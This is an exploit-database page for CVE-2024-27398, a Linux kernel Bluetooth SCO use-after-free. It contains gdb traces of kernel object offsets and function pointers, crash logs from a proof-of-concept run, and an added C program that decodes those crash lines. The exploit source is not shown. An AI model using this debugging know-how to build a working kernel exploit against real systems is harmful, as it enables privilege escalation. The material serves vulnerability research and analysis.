## https://sploitus.com/exploit?id=6C9F9253-B608-5184-B571-C8754462C82C
# CVE-2024-27398

Proof of concept for CVE-2024-27398, a use-after-free in the Linux kernel's Bluetooth SCO socket code (`net/bluetooth/sco.c`). What follows is the debugging record: a dmesg screenshot, the gdb breakpoints used to watch `sco_sock_connect`, `sco_sock_release` and `sco_conn_del`, and a second (v2) run.

## Dmesg Output
![PoC Screenshot](ss1_poc.png)

## ๐Ÿ“ GDB Breakpoints
```gdb
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) file vmlinxsef680 
Reading symbols from vmlinxsef680...
(gdb) target remote :1234
Remote debugging using :1234

(gdb) i b
Num     Type           Disp Enb Address            What
50      breakpoint     keep y   0xffffffff81e22640 in sco_sock_connect at net/bluetooth/sco.c:569
	breakpoint already hit 2 times
51      breakpoint     keep y   0xffffffff81e236e0 in sco_sock_release at net/bluetooth/sco.c:1237
	breakpoint already hit 2 times
52      breakpoint     keep y   0xffffffff81e22ef0 in sco_conn_del at net/bluetooth/sco.c:182

(gdb) p sock->sk
$224 = (struct sock *) 0xffff88810a2ee400
(gdb) x/gx 0xffff88810a2ee400 + 0x2a8
0xffff88810a2ee6a8:	0xffffffff81bd3390
(gdb) c
Continuing.

Thread 1 hit Breakpoint 38, sco_sock_connect (sock=0xffff88810d28d040, addr=0xffffc9000062fe80, alen=8, flags=2050) at net/bluetooth/sco.c:569
569		release_sock(sk);
(gdb) x/gx 0xffff88810a2ee400 + 0x2a8 # obj 1 offset
0xffff88810a2ee6a8:	0xffffffff81bd3390
(gdb) x/gx 0xffff88810a2ee400 + 0x2b0 # obj 2 offset
0xffff88810a2ee6b0:	0xffffffff81bd34b0
(gdb) x/gx 0xffff88810a2ee400 + 0x2a0 # obj 3 offset
0xffff88810a2ee6a0:	0xffffffff81bd17b0
```

## v2

In this run the PoC process itself segfaulted: it read from `0xffffffff832df600` in user mode (`error 5` is a protection violation on a user-mode read), and that address is exactly the kernel function pointer stored in `sk->sk_error_report` (`sock_def_error_report`), as the gdb query below shows.

```text
[362952.908697] poc9[893251]: segfault at ffffffff832df600 ip 000055a3bc3cf64d sp 00007fffdaa09ea0 error 5 in poc9[55a3bc3cf000+1000] likely on CPU 1 (core 1, socket 0)
[362952.909557] Code: 8b 45 f0 b9 ef be ad de 48 c7 c2 00 f6 2d 83 48 8d 35 2f 0a 00 00 48 89 c7 b8 00 00 00 00 e8 9a fb ff ff 48 c7 c0 00 f6 2d 83 <48> 8b 10 48 8b 45 f0 48 8d 0d 35 0a 00 00 48 89 ce 48 89 c7 b8 00
```

```gdb
(gdb) p sock->sk->sk_error_report
$71 = (void (*)(struct sock *)) 0xffffffff832df600 <sock_def_error_report>
```
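Added example, not part of the PoC or of this page's original content: a small C program that parses the two v2 dmesg lines above (copied here as its constructed input), decodes the x86 page-fault error code, checks whether the faulting address lies in kernel space, and decodes the instruction at the `<48>` marker and the one just before it. It only understands the two opcode forms that appear in this dump (`48 c7 /0 imm32` and `48 8b /r` with a bare register base); anything else is reported as undecoded rather than guessed. The `PF_*` values are the kernel's x86 page-fault error-code bits; the 42-byte prologue before the marker is how the x86 `Code:` dump is laid out.

```c
/* Added example, not part of the PoC: decode the v2 "segfault at" and "Code:"
 * dmesg lines. PF_* are the kernel's x86 page-fault error-code bits. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PF_PROT  0x01 /* set: protection violation, clear: page not present */
#define PF_WRITE 0x02 /* set: write, clear: read */
#define PF_USER  0x04 /* set: fault taken in user mode */

struct segfault { unsigned long addr, ip, sp; unsigned err; };

/* Returns 1 and fills *sf when the line carries a "segfault at" record. */
int parse_segfault(const char *line, struct segfault *sf)
{
    const char *p = strstr(line, "segfault at ");
    return p && sscanf(p, "segfault at %lx ip %lx sp %lx error %u",
                       &sf->addr, &sf->ip, &sf->sp, &sf->err) == 4;
}

/* x86-64: the upper canonical half is kernel space. */
int is_kernel_addr(unsigned long a) { return a >= 0xffff800000000000UL; }

/* 1 when user mode took a protection fault on a kernel address, i.e. the
 * process dereferenced a kernel pointer directly. */
int user_touched_kernel(const struct segfault *sf)
{
    return (sf->err & PF_USER) && (sf->err & PF_PROT) && is_kernel_addr(sf->addr);
}

/* Parse "Code: 8b 45 ... <48> 8b 10 ..." into out[]; *fault_idx receives the
 * index of the <bracketed> byte (start of the faulting insn) or -1. Returns the
 * byte count; the x86 dump places 42 bytes before the fault. */
int parse_code_line(const char *line, unsigned char *out, int max, int *fault_idx)
{
    const char *p = strstr(line, "Code: ");
    int n = 0;
    *fault_idx = -1;
    if (!p) return 0;
    for (p += strlen("Code: "); n < max; ) {
        char *end; unsigned long v;
        while (*p == ' ') p++;
        if (*p == '<') *fault_idx = n, p++;
        v = strtoul(p, &end, 16);
        if (end == p) break; /* end of line or a non-hex token */
        out[n++] = (unsigned char)v;
        p = (*end == '>') ? end + 1 : end;
    }
    return n;
}

/* Decoder for the two forms in this dump: "48 c7 /0 imm32" (mov r64, simm32) and
 * "48 8b /r" with mod=00 and a bare register base (mov r64, [r64]); else 0. */
int decode_insn(const unsigned char *p, int avail, char *out, size_t n)
{
    static const char *r64[] = {"rax","rcx","rdx","rbx","rsp","rbp","rsi","rdi"};
    if (avail >= 7 && p[0] == 0x48 && p[1] == 0xc7 && (p[2] & 0xf8) == 0xc0) {
        uint32_t u = p[3] | (p[4] << 8) | (p[5] << 16) | ((uint32_t)p[6] << 24);
        long long imm = (u & 0x80000000u) ? (long long)u - 0x100000000LL : (long long)u;
        snprintf(out, n, "mov %s, 0x%llx", r64[p[2] & 7], (unsigned long long)imm);
        return 7;
    }
    if (avail >= 3 && p[0] == 0x48 && p[1] == 0x8b && (p[2] & 0xc0) == 0 &&
        (p[2] & 7) != 4 && (p[2] & 7) != 5) {
        snprintf(out, n, "mov %s, [%s]", r64[(p[2] >> 3) & 7], r64[p[2] & 7]);
        return 3;
    }
    return 0;
}

/* Constructed input: the two v2 dmesg lines from the page. */
static const char *SEGFAULT_LINE =
    "[362952.908697] poc9[893251]: segfault at ffffffff832df600 ip 000055a3bc3cf64d "
    "sp 00007fffdaa09ea0 error 5 in poc9[55a3bc3cf000+1000] likely on CPU 1 (core 1, socket 0)";
static const char *CODE_LINE =
    "[362952.909557] Code: 8b 45 f0 b9 ef be ad de 48 c7 c2 00 f6 2d 83 48 8d 35 2f 0a 00 00 "
    "48 89 c7 b8 00 00 00 00 e8 9a fb ff ff 48 c7 c0 00 f6 2d 83 <48> 8b 10 48 8b 45 f0 "
    "48 8d 0d 35 0a 00 00 48 89 ce 48 89 c7 b8 00";

int main(void)
{
    struct segfault sf; unsigned char code[64];
    char insn[48]; int n, fault;
    if (!parse_segfault(SEGFAULT_LINE, &sf)) return 1;
    printf("addr 0x%lx ip 0x%lx error %u: %s-mode %s, %s\n", sf.addr, sf.ip, sf.err,
           (sf.err & PF_USER) ? "user" : "kernel", (sf.err & PF_WRITE) ? "write" : "read",
           (sf.err & PF_PROT) ? "protection violation" : "page not present");
    if (user_touched_kernel(&sf))
        puts("=> the process dereferenced a kernel address directly");
    n = parse_code_line(CODE_LINE, code, sizeof code, &fault);
    /* Stepping back 7 bytes is only safe because decode_insn rejects other bytes. */
    if (fault >= 7 && decode_insn(code + fault - 7, 7, insn, sizeof insn))
        printf("before fault: %s\n", insn);
    if (fault >= 0 && decode_insn(code + fault, n - fault, insn, sizeof insn))
        printf("at fault:     %s\n", insn);
    return 0;
}
```

Running it shows that the instruction right before the fault is `mov rax, 0xffffffff832df600`, the same value gdb prints for `sk->sk_error_report`, and the faulting instruction is `mov rdx, [rax]`: the v2 binary hard-coded that kernel address and read it from user space, which the MMU refuses whether or not the kernel-side bug fired. The same address is also loaded into `rdx` earlier in the dump (the `48 c7 c2 ...` bytes), consistent with it having been passed to a call just before.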
## References

- https://github.com/qiutianshu/sco-race-condition
- https://www.openwall.com/lists/oss-security/2024/11/29/1